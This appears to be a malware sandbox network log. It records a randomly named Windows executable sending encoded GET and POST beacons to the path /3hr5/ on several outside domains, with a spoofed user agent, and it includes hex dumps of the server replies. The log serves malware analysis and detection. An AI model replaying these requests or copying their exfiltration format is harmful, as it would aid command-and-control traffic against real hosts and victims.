                                                                                                                              Data Ascii: 9XskuxXRAV94DIJU1igwVxJtYKube0eh8WTdPBS5waC8kc+vpZiRfz9EjG1iqNDN3csr/N5ENcGTTEP7paBtXPoqsHcj3YH9nBhLFLhJ3AIgo0+EqwwiB25sE203nh8Mme1Ze8agOgoNpel3Wu4lVGUoymwPEEdGQ7LP3UpasHs4VX87LLtdCB30rtVXd/ujIEkBMZEfd76nCemc94zoGEURJ5iozTDBOnoCgsc+4rLiNah/Pjx
                                                                                                                              Dec 4, 2023 15:28:03.823013067 CET3912OUTData Raw: 6e 45 44 53 6c 4e 4c 53 41 65 54 6e 2b 44 6c 54 6d 6c 43 68 2f 41 57 6a 55 30 35 52 4c 49 65 30 63 5a 70 42 44 74 33 46 65 39 31 32 33 6e 66 46 6b 47 6b 45 37 36 47 6d 59 30 66 71 4c 70 65 54 62 4c 78 42 43 6c 74 55 36 55 54 4a 63 71 31 51 30 71
                                                                                                                              Data Ascii: nEDSlNLSAeTn+DlTmlCh/AWjU05RLIe0cZpBDt3Fe9123nfFkGkE76GmY0fqLpeTbLxBCltU6UTJcq1Q0q0/IP125XkhY2cUDgarKAavIhK4NwWm7rleqii0XUP1SYqi7vafQY+PDJBy1GlmFd+XczkJxH4fgLCEw+9DiXS/GF1OVtoDSifbT/8GCuWqzLQYP4rGpTOE2jSMwOGDefrTPE02kdQeWPMEjviDuEdRggcV+5lCo7U
                                                                                                                              Dec 4, 2023 15:28:03.823177099 CET3912OUTData Raw: 46 2b 4c 2f 47 4c 75 6f 77 39 34 41 66 67 33 39 38 61 36 39 55 70 6b 67 54 56 2f 74 56 76 66 6e 66 2b 68 52 72 38 77 51 68 65 30 6f 36 4c 79 6f 70 69 56 36 2b 66 30 64 67 32 77 45 73 66 31 79 31 34 68 47 32 79 6b 7a 79 6f 41 68 7a 41 38 52 5a 71
                                                                                                                              Data Ascii: F+L/GLuow94Afg398a69UpkgTV/tVvfnf+hRr8wQhe0o6LyopiV6+f0dg2wEsf1y14hG2ykzyoAhzA8RZqBGYI9hInXW9qPX2AUqCJpQ5mrHoGH+T+bySkMgfnYHaTcLvSB4kvlwAWMNZpfJ0sqR9x0msYZfggAxk0Br7eeu39bqcji5vwqF/5pfyguWeqwX8XnH+ygKdfL8HrU4DIuGLqRj9cMtpko9FBISbyQc+SA5++8ag1D
                                                                                                                              Dec 4, 2023 15:28:03.823347092 CET1340OUTData Raw: 35 79 6a 76 76 46 35 51 42 44 48 37 45 4b 4d 37 45 49 68 43 2f 47 56 39 2f 4a 67 39 78 74 67 4c 65 6f 4e 68 70 2b 6d 71 43 6e 54 4c 70 48 76 64 39 79 4a 43 72 47 36 37 54 4f 67 4c 53 73 52 4a 53 2f 6f 48 61 65 65 46 31 76 65 4f 64 72 38 2f 31 75
                                                                                                                              Data Ascii: 5yjvvF5QBDH7EKM7EIhC/GV9/Jg9xtgLeoNhp+mqCnTLpHvd9yJCrG67TOgLSsRJS/oHaeeF1veOdr8/1uSKoT+uMVsya26v2M+jGg1xEQu1b3W0rDQXN4Ol4nPb7kupeSGLW3NEPr1OX7vMjIfhvU2gFuqIdaDlzBEdnyTHOOTdxml1KyBDTtdGg20ol7CgCx/jJFGm0yRV30KC6Bx+4158yaLcKVHF6i0p0hiImcADpFnI616
                                                                                                                              Dec 4, 2023 15:28:03.823527098 CET6484OUTData Raw: 6b 31 38 73 7a 77 48 6e 65 51 42 47 33 47 4f 2f 4f 38 4f 52 49 73 32 39 48 72 33 44 36 76 50 6c 68 45 59 6d 6f 32 54 70 54 75 50 34 62 46 54 72 52 38 68 48 4f 4d 6b 45 57 79 73 74 5a 65 35 69 4a 39 55 59 2f 4a 48 36 5a 52 64 39 69 32 2b 6d 50 75
                                                                                                                              Data Ascii: k18szwHneQBG3GO/O8ORIs29Hr3D6vPlhEYmo2TpTuP4bFTrR8hHOMkEWystZe5iJ9UY/JH6ZRd9i2+mPuOM7yrwbby+GzKPSKtPoMYu2j7/5x41CFw5fFqpRXUvv9jFsfKdj/48NjPumnKvH9dnfbqAS4/BFL2MosMzl7EVOtRBnkfbnK8cQAnSSpblgCeQOtooya1DWQy8AtSx56IfyI5LG7dW4DLF9PsVBq+Dm1jW9LL3GIO
                                                                                                                              Dec 4, 2023 15:28:03.823697090 CET2626OUTData Raw: 39 4e 36 75 6d 70 4c 44 43 78 32 70 41 6c 67 71 63 36 44 6d 42 41 76 61 5a 33 6a 63 76 6f 6d 75 78 39 32 4b 63 66 30 72 4c 50 50 30 51 44 50 7a 61 36 30 73 42 4c 72 58 4e 66 68 34 52 6d 71 55 48 36 53 70 79 64 77 4f 44 37 53 71 38 6f 44 42 4e 42
                                                                                                                              Data Ascii: 9N6umpLDCx2pAlgqc6DmBAvaZ3jcvomux92Kcf0rLPP0QDPza60sBLrXNfh4RmqUH6SpydwOD7Sq8oDBNBYq7IHlEej317Ef+WPl2B6glPhvObNJvI7aVPmpfcach48F4y3R1W6G+mPB57QmoePTy3wNK/dVhn1I9BeU2rP4byhcrJ0ehZ7COcHMZCu/RGcWuYw0j6MesBvVuvlvbiibs8ON1DvMVeYiXinnso927gnbwGqedfR
                                                                                                                              Dec 4, 2023 15:28:04.011384010 CET2626OUTData Raw: 50 56 68 4b 51 58 59 6b 66 68 5a 37 2b 44 55 77 47 69 73 4a 66 4f 79 62 66 36 6a 79 7a 4f 55 49 31 74 37 54 50 52 77 63 4a 33 48 58 66 55 47 7a 39 32 72 4c 43 42 51 6b 45 55 70 68 64 7a 6d 6d 58 50 42 47 58 2b 53 59 33 74 37 77 56 37 66 2b 67 6a
                                                                                                                              Data Ascii: PVhKQXYkfhZ7+DUwGisJfOybf6jyzOUI1t7TPRwcJ3HXfUGz92rLCBQkEUphdzmmXPBGX+SY3t7wV7f+gjF5otpbESlyLr+lVYy+fVI5sgzNtpt7UQz0CVpwGm8jE9TUySR9y5HilepnlcgwhGNILfkxw15f3h3urgCGiwSgM04AiHZLkIgeFrlHyCJ/fYS5XfS4J/+gJelr8mcP1KXSrWjq9EZLkwzOZt74QgiTOpF9Bq3llh5
                                                                                                                              Dec 4, 2023 15:28:04.011470079 CET2626OUTData Raw: 6e 39 4f 71 4a 33 51 31 66 51 62 45 71 4a 34 7a 63 72 71 59 4d 79 6a 57 74 75 74 36 62 32 61 38 79 4d 57 59 38 63 41 6a 67 64 35 59 41 48 62 55 55 35 53 6b 51 44 71 73 73 33 4c 48 39 2f 42 2b 78 59 45 4a 5a 4f 68 41 32 71 4f 42 47 71 39 30 52 37
                                                                                                                              Data Ascii: n9OqJ3Q1fQbEqJ4zcrqYMyjWtut6b2a8yMWY8cAjgd5YAHbUU5SkQDqss3LH9/B+xYEJZOhA2qOBGq90R7Ba3OE4F5phdK3I5akmXbHLSD2WeqLquRjibnx7NeQpK/8u3xLUYZAyLcWrdET97yr6VLrYzhF/FFHMWXzS2TGe42jmoP5y0uXraaqOXyMf1Vsy5Sjk7kGEfu/PChD/KiWM/tY3DmF43KcI78u/ZEupil3jco7/ZUV
                                                                                                                              Dec 4, 2023 15:28:04.203397036 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:03 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              85192.168.11.2050216217.160.0.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:06.351089001 CET548OUTGET /3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.austintrafficlawyer.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:28:06.544097900 CET824INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 626
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:06 GMT
                                                                                                                              Server: Apache
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              86192.168.11.205021723.227.38.74808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:11.796370029 CET816OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.littlehappiez.com
                                                                                                                              Referer: http://www.littlehappiez.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 48 4b 72 31 72 4a 7a 57 5a 75 2f 69 72 59 70 43 51 66 63 64 38 58 42 33 6a 61 41 68 4b 5a 71 2b 7a 36 49 33 63 66 4d 69 4a 41 41 36 79 77 74 62 6b 33 47 68 65 44 75 32 51 4c 58 43 44 59 34 70 42 7a 74 6e 4e 43 4b 37 4a 30 48 6f 39 59 73 6b 74 51 78 6f 61 53 31 4a 6f 33 79 4c 4a 6a 74 4a 6a 52 62 5a 6f 54 33 2b 67 31 35 6a 74 74 55 54 61 36 55 4f 76 64 77 4d 5a 38 6f 62 72 31 6a 5a 72 4f 76 39 48 71 53 77 34 4a 2f 51 62 62 57 5a 4c 45 78 63 43 30 57 65 58 43 57 49 4e 33 4e 4e 73 76 4d 6c 4e 45 61 69 4a 42 42 6e 6f 6e 75 49 56 67 3d 3d
                                                                                                                              Data Ascii: TZd=HKr1rJzWZu/irYpCQfcd8XB3jaAhKZq+z6I3cfMiJAA6ywtbk3GheDu2QLXCDY4pBztnNCK7J0Ho9YsktQxoaS1Jo3yLJjtJjRbZoT3+g15jttUTa6UOvdwMZ8obr1jZrOv9HqSw4J/QbbWZLExcC0WeXCWIN3NNsvMlNEaiJBBnonuIVg==
                                                                                                                              Dec 4, 2023 15:28:12.131624937 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:12 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Content-Language: en-US
                                                                                                                              Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:12 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:12 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_y=7e9a8744-5900-4053-b9f4-3d92c1cb1401; Expires=Tue, 03-Dec-24 14:28:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_s=848dc933-1a65-49de-9c6f-80044a2f9b06; Expires=Mon, 04-Dec-23 14:58:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Server-Timing: processing;dur=189
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=18b0d218-e0c6-421
                                                                                                                              Data Raw:
                                                                                                                              Data Ascii:
                                                                                                                              Dec 4, 2023 15:28:12.131697893 CET1035INData Raw: 2d 62 65 66 34 2d 65 65 30 36 35 61 63 65 32 31 33 36 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a 58
                                                                                                                              Data Ascii: -bef4-ee065ace2136X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                              Dec 4, 2023 15:28:12.131822109 CET1340INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                              Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                              Dec 4, 2023 15:28:12.131871939 CET437INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                              Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              87192.168.11.205021823.227.38.74808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:14.411942005 CET1156OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.littlehappiez.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.littlehappiez.com
                                                                                                                              Referer: http://www.littlehappiez.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 48 4b 72 31 72 4a 7a 57 5a 75 2f 69 71 35 5a 43 63 59 6f 64 72 6e 42 32 2f 71 41 68 63 70 71 79 7a 36 45 33 63 61 74 76 4f 79 6b 36 31 55 70 62 31 44 71 68 5a 44 75 32 66 72 58 62 4e 34 34 69 42 7a 68 5a 4e 47 4b 37 4a 30 44 6f 2f 70 4d 6b 72 67 78 76 52 79 31 4b 68 58 79 47 65 7a 73 49 6a 52 57 6c 6f 53 6a 2b 68 46 56 6a 6a 50 38 54 4e 37 55 4e 71 39 78 46 66 38 6f 55 68 56 6a 4c 72 4f 53 43 48 76 2b 47 34 2f 33 51 59 2f 6d 5a 4b 45 78 54 5a 55 57 54 49 79 58 33 48 55 51 4b 6e 63 34 68 4e 57 4f 67 42 6a 31 32 6b 55 71 59 46 6a 63 58 52 61 78 77 6c 76 31 4c 65 74 69 77 59 73 34 32 67 41 6e 38 4c 52 56 6c 6a 4a 4e 35 7a 52 61 33 71 6a 44 6f 64 6f 2f 59 7a 69 71 47 71 39 66 48 31 78 4f 33 33 4c 59 72 4d 65 77 73 48 4a 70 63 64 4a 45 39 34 73 59 76 68 74 58 64 6d 4d 6b 6f 45 51 70 52 47 38 74 68 70 78 6d 4d 6d 59 74 76 41 54 39 73 32 49 72 64 71 37 57 65 39 70 4f 4c 4a 4d 4e 6d 62 6c 75 45 74 47 6d 6e 52 74 53 48 47 37 2b 55 57 39 74 57 34 61 62 6b 50 53 7a 2b 58 66 51 36 43 30 77 4e 50 74 46 53 59 7a 52 4c 35 38 47 4b 52 35 4a 44 47 34 7a 75 72 31 64 41 38 6a 46 38 75 70 7a 52 37 54 58 79 71 6e 55 73 68 76 74 47 65 42 39 37 6e 34 67 32 43 44 62 71 2b 72 53 7a 75 50 67 4c 45 4c 4d 76 6f 4d 55 56 4a 55 64 4e 64 6e 6c 67 69 45 32 52 5a 47 61 45 6c 7a 66 55 55 7a 33 56 30 58 5a 70 7a 68 4c 43 45 6d 7a 4b 6f 47 73 75 66 77 42 32 48 2b 6f 38 6b 66 4b 69 58 44 61 71 53 2b 4c 6c 73 34 50 6d 38 4d 76 66 2f 6f 65 76 2f 6a 58 30 79 79 57 43 6f 6d 4f 35 53 36 35 36 6b 35 37 36 65 34 72 74 75 55 7a 69 47 30 41 70 68 58 62 76 54 49 62 50 59 68 6b 3d
                                                                                                                              Data Ascii: TZd=HKr1rJzWZu/iq5ZCcYodrnB2/qAhcpqyz6E3catvOyk61Upb1DqhZDu2frXbN44iBzhZNGK7J0Do/pMkrgxvRy1KhXyGezsIjRWloSj+hFVjjP8TN7UNq9xFf8oUhVjLrOSCHv+G4/3QY/mZKExTZUWTIyX3HUQKnc4hNWOgBj12kUqYFjcXRaxwlv1LetiwYs42gAn8LRVljJN5zRa3qjDodo/YziqGq9fH1xO33LYrMewsHJpcdJE94sYvhtXdmMkoEQpRG8thpxmMmYtvAT9s2Irdq7We9pOLJMNmbluEtGmnRtSHG7+UW9tW4abkPSz+XfQ6C0wNPtFSYzRL58GKR5JDG4zur1dA8jF8upzR7TXyqnUshvtGeB97n4g2CDbq+rSzuPgLELMvoMUVJUdNdnlgiE2RZGaElzfUUz3V0XZpzhLCEmzKoGsufwB2H+o8kfKiXDaqS+Lls4Pm8Mvf/oev/jX0yyWComO5S656k576e4rtuUziG0AphXbvTIbPYhk=
                                                                                                                              Dec 4, 2023 15:28:14.682645082 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:14 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Sorting-Hat-PodId: 293
                                                                                                                              X-Sorting-Hat-ShopId: 83935199526
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              X-ShopId: 83935199526
                                                                                                                              X-ShardId: 293
                                                                                                                              Content-Language: en-US
                                                                                                                              Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:14 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:14 GMT; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_y=02be2310-1102-43bf-bbf2-013301af3494; Expires=Tue, 03-Dec-24 14:28:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: _shopify_s=031fab2f-5531-432f-acdb-c3e393998f7a; Expires=Mon, 04-Dec-23 14:58:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                              Server-Timing: processing;dur=121
                                                                                                                              X-Shopify-Stage: production
                                                                                                                              Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9b7230b8-28ec-4cf
                                                                                                                              Data Raw:
                                                                                                                              Data Ascii:
                                                                                                                              Dec 4, 2023 15:28:14.682717085 CET1035INData Raw: 2d 39 33 35 32 2d 64 36 66 33 30 61 66 38 36 62 36 31 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a 58
                                                                                                                              Data Ascii: -9352-d6f30af86b61X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                              Dec 4, 2023 15:28:14.682774067 CET1340INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                              Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                              Dec 4, 2023 15:28:14.682823896 CET437INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
